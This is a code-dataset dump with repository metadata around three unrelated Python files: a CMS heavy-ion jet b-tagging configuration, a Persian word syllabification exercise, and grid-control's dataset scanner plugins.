from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akPuFilter1PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPuFilter1PFJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
akPuFilter1PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter1HiGenJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
akPuFilter1PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPuFilter1PFJets")
)
akPuFilter1PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPuFilter1PFJets"),
payload = "AKPu1PF_offline"
)
akPuFilter1PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPuFilter1CaloJets'))
#akPuFilter1PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak1HiSignalGenJets'))
akPuFilter1PFbTagger = bTaggers("akPuFilter1PF",0.1)
#create objects locally since they dont load properly otherwise
#akPuFilter1PFmatch = akPuFilter1PFbTagger.match
akPuFilter1PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPuFilter1PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akPuFilter1PFPatJetFlavourAssociationLegacy = akPuFilter1PFbTagger.PatJetFlavourAssociationLegacy
akPuFilter1PFPatJetPartons = akPuFilter1PFbTagger.PatJetPartons
akPuFilter1PFJetTracksAssociatorAtVertex = akPuFilter1PFbTagger.JetTracksAssociatorAtVertex
akPuFilter1PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexBJetTags
akPuFilter1PFCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexV2BJetTags
akPuFilter1PFJetBProbabilityBJetTags = akPuFilter1PFbTagger.JetBProbabilityBJetTags
akPuFilter1PFSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.SoftPFMuonByPtBJetTags
akPuFilter1PFSoftPFMuonByIP3dBJetTags = akPuFilter1PFbTagger.SoftPFMuonByIP3dBJetTags
akPuFilter1PFTrackCountingHighEffBJetTags = akPuFilter1PFbTagger.TrackCountingHighEffBJetTags
akPuFilter1PFTrackCountingHighPurBJetTags = akPuFilter1PFbTagger.TrackCountingHighPurBJetTags
akPuFilter1PFPatJetPartonAssociationLegacy = akPuFilter1PFbTagger.PatJetPartonAssociationLegacy
akPuFilter1PFImpactParameterTagInfos = akPuFilter1PFbTagger.ImpactParameterTagInfos
akPuFilter1PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuFilter1PFJetProbabilityBJetTags = akPuFilter1PFbTagger.JetProbabilityBJetTags
akPuFilter1PFSecondaryVertexTagInfos = akPuFilter1PFbTagger.SecondaryVertexTagInfos
akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexBJetTags
akPuFilter1PFCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexV2BJetTags
akPuFilter1PFSecondaryVertexNegativeTagInfos = akPuFilter1PFbTagger.SecondaryVertexNegativeTagInfos
akPuFilter1PFNegativeSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFNegativeSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFNegativeCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akPuFilter1PFPositiveCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akPuFilter1PFNegativeCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPuFilter1PFPositiveCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPuFilter1PFSoftPFMuonsTagInfos = akPuFilter1PFbTagger.SoftPFMuonsTagInfos
akPuFilter1PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuFilter1PFSoftPFMuonBJetTags = akPuFilter1PFbTagger.SoftPFMuonBJetTags
akPuFilter1PFSoftPFMuonByIP3dBJetTags = akPuFilter1PFbTagger.SoftPFMuonByIP3dBJetTags
akPuFilter1PFSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.SoftPFMuonByPtBJetTags
akPuFilter1PFNegativeSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.NegativeSoftPFMuonByPtBJetTags
akPuFilter1PFPositiveSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.PositiveSoftPFMuonByPtBJetTags
akPuFilter1PFPatJetFlavourIdLegacy = cms.Sequence(akPuFilter1PFPatJetPartonAssociationLegacy*akPuFilter1PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPuFilter1PFPatJetFlavourAssociation = akPuFilter1PFbTagger.PatJetFlavourAssociation
#akPuFilter1PFPatJetFlavourId = cms.Sequence(akPuFilter1PFPatJetPartons*akPuFilter1PFPatJetFlavourAssociation)
akPuFilter1PFJetBtaggingIP = cms.Sequence(akPuFilter1PFImpactParameterTagInfos *
(akPuFilter1PFTrackCountingHighEffBJetTags +
akPuFilter1PFTrackCountingHighPurBJetTags +
akPuFilter1PFJetProbabilityBJetTags +
akPuFilter1PFJetBProbabilityBJetTags
)
)
akPuFilter1PFJetBtaggingSV = cms.Sequence(akPuFilter1PFImpactParameterTagInfos
*
akPuFilter1PFSecondaryVertexTagInfos
* (akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags+
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags+
akPuFilter1PFCombinedSecondaryVertexBJetTags+
akPuFilter1PFCombinedSecondaryVertexV2BJetTags
)
)
akPuFilter1PFJetBtaggingNegSV = cms.Sequence(akPuFilter1PFImpactParameterTagInfos
*
akPuFilter1PFSecondaryVertexNegativeTagInfos
* (akPuFilter1PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akPuFilter1PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akPuFilter1PFNegativeCombinedSecondaryVertexBJetTags+
akPuFilter1PFPositiveCombinedSecondaryVertexBJetTags+
akPuFilter1PFNegativeCombinedSecondaryVertexV2BJetTags+
akPuFilter1PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPuFilter1PFJetBtaggingMu = cms.Sequence(akPuFilter1PFSoftPFMuonsTagInfos * (akPuFilter1PFSoftPFMuonBJetTags
+
akPuFilter1PFSoftPFMuonByIP3dBJetTags
+
akPuFilter1PFSoftPFMuonByPtBJetTags
+
akPuFilter1PFNegativeSoftPFMuonByPtBJetTags
+
akPuFilter1PFPositiveSoftPFMuonByPtBJetTags
)
)
akPuFilter1PFJetBtagging = cms.Sequence(akPuFilter1PFJetBtaggingIP
*akPuFilter1PFJetBtaggingSV
*akPuFilter1PFJetBtaggingNegSV
# *akPuFilter1PFJetBtaggingMu
)
akPuFilter1PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPuFilter1PFJets"),
genJetMatch = cms.InputTag("akPuFilter1PFmatch"),
genPartonMatch = cms.InputTag("akPuFilter1PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPuFilter1PFcorr")),
JetPartonMapSource = cms.InputTag("akPuFilter1PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPuFilter1PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPuFilter1PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPuFilter1PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPuFilter1PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPuFilter1PFJetBProbabilityBJetTags"),
cms.InputTag("akPuFilter1PFJetProbabilityBJetTags"),
#cms.InputTag("akPuFilter1PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPuFilter1PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPuFilter1PFTrackCountingHighEffBJetTags"),
cms.InputTag("akPuFilter1PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPuFilter1PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPuFilter1PFNjettiness = Njettiness.clone(
src = cms.InputTag("akPuFilter1PFJets"),
R0 = cms.double( 0.1)
)
akPuFilter1PFpatJetsWithBtagging.userData.userFloats.src += ['akPuFilter1PFNjettiness:tau1','akPuFilter1PFNjettiness:tau2','akPuFilter1PFNjettiness:tau3']
akPuFilter1PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPuFilter1PFpatJetsWithBtagging"),
genjetTag = 'ak1HiGenJets',
rParam = 0.1,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPuFilter1PF"),
jetName = cms.untracked.string("akPuFilter1PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akFilter1GenJets"),
doGenTaus = True
)
akPuFilter1PFJetSequence_mc = cms.Sequence(
#akPuFilter1PFclean
#*
akPuFilter1PFmatch
#*
#akPuFilter1PFmatchGroomed
*
akPuFilter1PFparton
*
akPuFilter1PFcorr
*
#akPuFilter1PFJetID
#*
akPuFilter1PFPatJetFlavourIdLegacy
#*
#akPuFilter1PFPatJetFlavourId # Use legacy algo till PU implemented
*
akPuFilter1PFJetTracksAssociatorAtVertex
*
akPuFilter1PFJetBtagging
*
akPuFilter1PFNjettiness
*
akPuFilter1PFpatJetsWithBtagging
*
akPuFilter1PFJetAnalyzer
)
akPuFilter1PFJetSequence_data = cms.Sequence(akPuFilter1PFcorr
*
#akPuFilter1PFJetID
#*
akPuFilter1PFJetTracksAssociatorAtVertex
*
akPuFilter1PFJetBtagging
*
akPuFilter1PFNjettiness
*
akPuFilter1PFpatJetsWithBtagging
*
akPuFilter1PFJetAnalyzer
)
akPuFilter1PFJetSequence_jec = cms.Sequence(akPuFilter1PFJetSequence_mc)
akPuFilter1PFJetSequence_mb = cms.Sequence(akPuFilter1PFJetSequence_mc)
akPuFilter1PFJetSequence = cms.Sequence(akPuFilter1PFJetSequence_jec)
akPuFilter1PFJetAnalyzer.genPtMin = cms.untracked.double(1)
akPuFilter1PFJetAnalyzer.jetPtMin = cms.double(1)
| [
"[email protected]"
]
| |
5aec16750f6f86a0cdcfca7f3b20d9375929d277 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /TsRjbMRoNCM3GHuDk_9.py | 7ca02c3b7d778338936732065ba5053888817fc2 | []
| no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,568 | py | """
The syllabic structure of Persian language is CV(C)(C). C stands for
consonants and V stands for Vowels. The CV(C)(C) means that there are three
types of syllables in Persian:
* CV
* CVC
* CVCC
Write a function that takes the phonetic transcription of a Persian word as an
argument and returns the syllabified word based on the syllabic structure. In
other words, put a period between syllables.
### Examples
syllabification("kAr") ➞ "kAr"
syllabification("bArAn") ➞ "bA.rAn"
syllabification("tA") ➞ "tA"
syllabification("deraxt") ➞ "de.raxt"
syllabification("pust") ➞ "pust"
syllabification("lAjevard") ➞ "lA.je.vard"
### Notes
* Mono-syllabic words don't need syllabification.
* Persian has six vowels: `a, A, e, i, o, u`
* Persian has 23 consonants: `p, b, t, d, k, g, G, ?, f, v, s, z, S, Z, x, h, c, j, m, n, r, l, y`
* Try to solve the problem by using RegEx.
### Hint
Since each syllable has only one vowel, it's not necessary to know the
consonants. Just knowing that there is only one consonant before the vowel
and 0 to 2 consonants after the vowel is enough to solve the challenge.
"""
def syllabification(word):
v = 'aAeiou'
lst_idx_v = [i for i, l in enumerate(word) if l in v]
if len(lst_idx_v) == 1:
return word
begin = 0
syllables = []
for i in range(1, len(lst_idx_v)):
syllables.append(word[begin: lst_idx_v[i] - 1])
begin = lst_idx_v[i] - 1
syllables.append(word[begin:])
return '.'.join(syllables)
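# The note above suggests trying RegEx; below is a sketch of such a variant (it reproduces
# the docstring examples, assuming every input follows the CV(C)(C) structure described above).
import re
def syllabification_regex(word):
    # one onset consonant cluster, one vowel, then trailing consonants taken lazily until
    # the next consonant+vowel pair (the start of the next syllable) or the end of the word
    return '.'.join(re.findall(r'[^aAeiou]*[aAeiou][^aAeiou]*?(?=[^aAeiou][aAeiou]|$)', word))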
| [
"[email protected]"
]
| |
611a0c5777f47f7658d656110a34f4b258b8ccf4 | 8fcdcec1bf0f194d23bba4acd664166a04dc128f | /packages/grid_control/datasets/scanner_basic.py | db6e80561435f992b58c20ba4e1205c5861bfe7a | []
| no_license | grid-control/grid-control | e51337dd7e5d158644a8da35923443fb0d232bfb | 1f5295cd6114f3f18958be0e0618ff6b35aa16d7 | refs/heads/master | 2022-11-13T13:29:13.226512 | 2021-10-01T14:37:59 | 2021-10-01T14:37:59 | 13,805,261 | 32 | 30 | null | 2023-02-19T16:22:47 | 2013-10-23T14:39:28 | Python | UTF-8 | Python | false | false | 16,454 | py | # | Copyright 2010-2017 Karlsruhe Institute of Technology
# |
# | Licensed under the Apache License, Version 2.0 (the "License");
# | you may not use this file except in compliance with the License.
# | You may obtain a copy of the License at
# |
# | http://www.apache.org/licenses/LICENSE-2.0
# |
# | Unless required by applicable law or agreed to in writing, software
# | distributed under the License is distributed on an "AS IS" BASIS,
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# | See the License for the specific language governing permissions and
# | limitations under the License.
import os, logging
from grid_control.backends.storage import se_ls
from grid_control.config import ConfigError, create_config
from grid_control.datasets import DataProvider, DatasetError
from grid_control.datasets.scanner_base import InfoScanner
from grid_control.job_db import JobClass
from grid_control.job_selector import AndJobSelector, ClassSelector, JobSelector
from grid_control.utils import DictFormat, clean_path, split_opt
from grid_control.utils.activity import ProgressActivity
from grid_control.utils.algos import filter_dict
from grid_control.utils.parsing import parse_str
from hpfwk import clear_current_exception
from python_compat import identity, ifilter, imap, irange, izip, lfilter, lidfilter, lmap, set, sorted # pylint:disable=line-too-long
class AddFilePrefix(InfoScanner):
alias_list = ['prefix']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._prefix = config.get('filename prefix', '')
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
yield (self._prefix + item, metadata_dict, entries, location_list, obj_dict)
class DetermineEntries(InfoScanner):
alias_list = ['DetermineEvents', 'events']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._entries_cmd = config.get(['events command', 'entries command'], '')
self._entries_key = config.get(['events key', 'entries key'], '')
self._entries_key_scale = config.get_float(['events per key value', 'entries per key value'], 1.)
self._entries_default = config.get_int(['events default', 'entries default'], -1)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if (entries is None) or (entries < 0):
entries = self._entries_default
if self._entries_key:
entries_meta = int(metadata_dict.get(self._entries_key, entries))
entries = max(1, int(entries_meta * self._entries_key_scale))
if self._entries_cmd:
try:
entries = int(os.popen('%s %s' % (self._entries_cmd, item)).readlines()[-1])
except Exception:
self._log.log(logging.INFO2, 'Unable to determine entries with %r %r', self._entries_cmd, item)
clear_current_exception()
yield (item, metadata_dict, entries, location_list, obj_dict)
class FilesFromDataProvider(InfoScanner):
alias_list = ['provider_files']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
source_dataset_path = config.get('source dataset path')
self._source = DataProvider.create_instance('ListProvider', config,
'source dataset', source_dataset_path)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
for block in self._source.get_block_list_cached(show_stats=False):
metadata_keys = block.get(DataProvider.Metadata, [])
for fi in block[DataProvider.FileList]:
metadata_dict['SRC_DATASET'] = block[DataProvider.Dataset]
metadata_dict['SRC_BLOCK'] = block[DataProvider.BlockName]
metadata_dict.update(dict(izip(metadata_keys, fi.get(DataProvider.Metadata, []))))
yield (fi[DataProvider.URL], metadata_dict, fi[DataProvider.NEntries],
block[DataProvider.Locations], obj_dict)
class FilesFromJobInfo(InfoScanner):
alias_list = ['jobinfo_files']
def get_guard_keysets(self):
return (['SE_OUTPUT_FILE'], ['SE_OUTPUT_PATH'])
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if 'JOBINFO' not in obj_dict:
raise DatasetError('Job infos not available! Ensure that "JobInfoFromOutputDir" is selected!')
try:
job_info_dict = obj_dict['JOBINFO']
file_info_str_iter = ifilter(lambda x: x[0].startswith('file'), job_info_dict.items())
file_info_tuple_list = imap(lambda x_y: tuple(x_y[1].strip('"').split(' ')), file_info_str_iter)
for (file_hash, fn_local, fn_dest, se_path) in file_info_tuple_list:
metadata_dict.update({'SE_OUTPUT_HASH_MD5': file_hash, 'SE_OUTPUT_FILE': fn_local,
'SE_OUTPUT_BASE': os.path.splitext(fn_local)[0], 'SE_OUTPUT_PATH': se_path})
yield (os.path.join(se_path, fn_dest), metadata_dict, entries, location_list, obj_dict)
except Exception:
raise DatasetError('Unable to read file stageout information!')
class FilesFromLS(InfoScanner):
alias_list = ['ls']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._path = config.get('source directory', '.')
self._timeout = config.get_int('source timeout', 120)
self._trim = config.get_bool('source trim local', True)
self._recurse = config.get_bool('source recurse', False)
if '://' not in self._path:
self._path = 'file://' + self._path
(prot, path) = self._path.split('://')
self._path = prot + '://' + clean_path(path)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
metadata_dict['GC_SOURCE_DIR'] = self._path
progress = ProgressActivity('Reading source directory')
for counter, size_url in enumerate(self._iter_path(self._path)):
progress.update_progress(counter)
metadata_dict['FILE_SIZE'] = size_url[0]
url = size_url[1]
if self._trim:
url = url.replace('file://', '')
yield (url, metadata_dict, entries, location_list, obj_dict)
progress.finish()
def _iter_path(self, path):
proc = se_ls(path)
for size_basename in proc.stdout.iter(timeout=self._timeout):
(size, basename) = size_basename.strip().split(' ', 1)
size = int(size)
if size >= 0:
yield (size, os.path.join(path, basename))
elif self._recurse:
for result in self._iter_path(os.path.join(path, basename)):
yield result
if proc.status(timeout=0) != 0:
self._log.log_process(proc)
class JobInfoFromOutputDir(InfoScanner):
alias_list = ['dn_jobinfo']
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
job_info_path = os.path.join(item, 'job.info')
try:
job_info_dict = DictFormat('=').parse(open(job_info_path))
if job_info_dict.get('exitcode') == 0:
obj_dict['JOBINFO'] = job_info_dict
yield (item, metadata_dict, entries, location_list, obj_dict)
except Exception:
self._log.log(logging.INFO2, 'Unable to parse job info file %r', job_info_path)
clear_current_exception()
class MatchDelimeter(InfoScanner):
alias_list = ['delimeter']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
# delimeter based selection
match_delim_str = config.get('delimeter match', '')
self._match_delim = match_delim_str.split(':')
self._match_inactive = len(self._match_delim) != 2
# delimeter based metadata setup
self._setup_arg_list = []
self._guard_ds = self._setup('DELIMETER_DS',
config.get('delimeter dataset key', ''),
config.get('delimeter dataset modifier', ''))
self._guard_b = self._setup('DELIMETER_B',
config.get('delimeter block key', ''),
config.get('delimeter block modifier', ''))
def get_guard_keysets(self):
return (self._guard_ds, self._guard_b)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
fn_base = os.path.basename(item)
if self._match_inactive or fn_base.count(self._match_delim[0]) == int(self._match_delim[1]):
for setup in self._setup_arg_list:
self._process(item, metadata_dict, *setup)
yield (item, metadata_dict, entries, location_list, obj_dict)
def _process(self, item, metadata_dict, key, delim, delim_start, delim_end, modifier_fun):
value = str.join(delim, os.path.basename(item).split(delim)[delim_start:delim_end])
try:
metadata_dict[key] = str(modifier_fun(value))
except Exception:
raise DatasetError('Unable to modifiy %s: %r' % (key, value))
def _setup(self, setup_vn, setup_key, setup_mod):
if setup_key:
(delim, delim_start_str, delim_end_str) = split_opt(setup_key, '::')
modifier = identity
if setup_mod and (setup_mod.strip() != 'value'):
try:
modifier = eval('lambda value: ' + setup_mod) # pylint:disable=eval-used
except Exception:
raise ConfigError('Unable to parse delimeter modifier %r' % setup_mod)
(delim_start, delim_end) = (parse_str(delim_start_str, int), parse_str(delim_end_str, int))
self._setup_arg_list.append((setup_vn, delim, delim_start, delim_end, modifier))
return [setup_vn]
return []
class MatchOnFilename(InfoScanner):
alias_list = ['match']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._match = config.get_matcher('filename filter', '*.root', default_matcher='ShellStyleMatcher')
self._relative = config.get_bool('filename filter relative', True)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
fn_match = item
if self._relative:
fn_match = os.path.basename(item)
if self._match.match(fn_match) > 0:
yield (item, metadata_dict, entries, location_list, obj_dict)
class MetadataFromTask(InfoScanner):
alias_list = ['task_metadata']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
ignore_list_default = lmap(lambda x: 'SEED_%d' % x, irange(10)) + ['DOBREAK', 'FILE_NAMES',
'GC_DEPFILES', 'GC_JOBID', 'GC_JOBNUM', 'GC_JOB_ID', 'GC_PARAM', 'GC_RUNTIME', 'GC_VERSION',
'JOB_RANDOM', 'JOBID', 'LANDINGZONE_LL', 'LANDINGZONE_UL', 'MY_JOB', 'MY_JOBID', 'MY_RUNTIME',
'SB_INPUT_FILES', 'SB_OUTPUT_FILES', 'SCRATCH_LL', 'SCRATCH_UL', 'SEEDS',
'SE_INPUT_FILES', 'SE_INPUT_PATH', 'SE_INPUT_PATTERN', 'SE_MINFILESIZE',
'SE_OUTPUT_FILES', 'SE_OUTPUT_PATH', 'SE_OUTPUT_PATTERN', 'SUBST_FILES']
self._ignore_vars = config.get_list('ignore task vars', ignore_list_default)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if ('GC_TASK' in obj_dict) and ('GC_JOBNUM' in metadata_dict):
job_env_dict = obj_dict['GC_TASK'].get_job_dict(metadata_dict['GC_JOBNUM'])
for (key_new, key_old) in obj_dict['GC_TASK'].get_var_alias_map().items():
job_env_dict[key_new] = job_env_dict.get(key_old)
metadata_dict.update(filter_dict(job_env_dict, key_filter=lambda k: k not in self._ignore_vars))
yield (item, metadata_dict, entries, location_list, obj_dict)
class OutputDirsFromConfig(InfoScanner):
alias_list = ['config_dn']
# Get output directories from external config file
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
ext_config_fn = config.get_fn('source config')
ext_config_raw = create_config(ext_config_fn, load_only_old_config=True)
ext_config = ext_config_raw.change_view(set_sections=['global'])
self._ext_work_dn = ext_config.get_work_path()
logging.getLogger().disabled = True
ext_workflow = ext_config.get_plugin('workflow', 'Workflow:global', cls='Workflow',
pkwargs={'backend': 'NullWMS'})
logging.getLogger().disabled = False
self._ext_task = ext_workflow.task
job_selector = JobSelector.create(config.get('source job selector', ''), task=self._ext_task)
self._selected = sorted(ext_workflow.job_manager.job_db.get_job_list(AndJobSelector(
ClassSelector(JobClass.SUCCESS), job_selector)))
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
progress_max = None
if self._selected:
progress_max = self._selected[-1] + 1
progress = ProgressActivity('Reading job logs', progress_max)
for jobnum in self._selected:
progress.update_progress(jobnum)
metadata_dict['GC_JOBNUM'] = jobnum
obj_dict.update({'GC_TASK': self._ext_task, 'GC_WORKDIR': self._ext_work_dn})
job_output_dn = os.path.join(self._ext_work_dn, 'output', 'job_%d' % jobnum)
yield (job_output_dn, metadata_dict, entries, location_list, obj_dict)
progress.finish()
class OutputDirsFromWork(InfoScanner):
alias_list = ['work_dn']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._ext_work_dn = config.get_dn('source directory')
self._ext_output_dir = os.path.join(self._ext_work_dn, 'output')
if not os.path.isdir(self._ext_output_dir):
raise DatasetError('Unable to find task output directory %s' % repr(self._ext_output_dir))
self._selector = JobSelector.create(config.get('source job selector', ''))
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
dn_list = lfilter(lambda fn: fn.startswith('job_'), os.listdir(self._ext_output_dir))
progress = ProgressActivity('Reading job logs', len(dn_list))
for idx, dn in enumerate(dn_list):
progress.update_progress(idx)
try:
metadata_dict['GC_JOBNUM'] = int(dn.split('_')[1])
except Exception:
clear_current_exception()
continue
obj_dict['GC_WORKDIR'] = self._ext_work_dn
if self._selector and not self._selector(metadata_dict['GC_JOBNUM'], None):
continue
job_output_dn = os.path.join(self._ext_output_dir, dn)
yield (job_output_dn, metadata_dict, entries, location_list, obj_dict)
progress.finish()
class ParentLookup(InfoScanner):
alias_list = ['parent']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._parent_source = config.get('parent source', '')
self._parent_keys = config.get_list('parent keys', [])
self._parent_match_level = config.get_int('parent match level', 1)
self._parent_merge = config.get_bool('merge parents', False)
# cached "parent lfn parts" (plfnp) to "parent dataset name" (pdn) maps
self._plfnp2pdn_cache = {} # the maps are stored for different parent_dataset_expr
self._empty_config = create_config(use_default_files=False, load_old_config=False)
self._read_plfnp_map(config, self._parent_source) # read from configured parent source
def get_guard_keysets(self):
if self._parent_merge:
return ([], [])
return ([], ['PARENT_PATH'])
def _get_lfnp(self, lfn): # get lfn parts (lfnp)
if lfn and self._parent_match_level: # return looseMatch path elements in reverse order
# /store/local/data/file.root -> file.root (~ML1) | file.root/data/local (~ML3)
tmp = lfn.split('/')
tmp.reverse()
return str.join('/', tmp[:self._parent_match_level])
return lfn
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
# if parent source is not defined, try to get datacache from GC_WORKDIR
map_plfnp2pdn = dict(self._plfnp2pdn_cache.get(self._parent_source, {}))
datacache_fn = os.path.join(obj_dict.get('GC_WORKDIR', ''), 'datacache.dat')
if os.path.exists(datacache_fn): # extend configured parent source with datacache if it exists
map_plfnp2pdn.update(self._read_plfnp_map(self._empty_config, datacache_fn))
pdn_list = [] # list with parent dataset names
for key in ifilter(metadata_dict.__contains__, self._parent_keys):
parent_lfn_list = metadata_dict[key]
if not isinstance(parent_lfn_list, list):
parent_lfn_list = [metadata_dict[key]]
for parent_lfn in parent_lfn_list:
pdn_list.append(map_plfnp2pdn.get(self._get_lfnp(parent_lfn)))
metadata_dict['PARENT_PATH'] = lidfilter(set(pdn_list))
yield (item, metadata_dict, entries, location_list, obj_dict)
def _read_plfnp_map(self, config, parent_dataset_expr):
if parent_dataset_expr and (parent_dataset_expr not in self._plfnp2pdn_cache):
# read parent source and fill lfnMap with parent_lfn_parts -> parent dataset name mapping
map_plfnp2pdn = self._plfnp2pdn_cache.setdefault(parent_dataset_expr, {})
for block in DataProvider.iter_blocks_from_expr(self._empty_config, parent_dataset_expr):
for fi in block[DataProvider.FileList]:
map_plfnp2pdn[self._get_lfnp(fi[DataProvider.URL])] = block[DataProvider.Dataset]
return self._plfnp2pdn_cache.get(parent_dataset_expr, {}) # return cached mapping
| [
"[email protected]"
]
| |
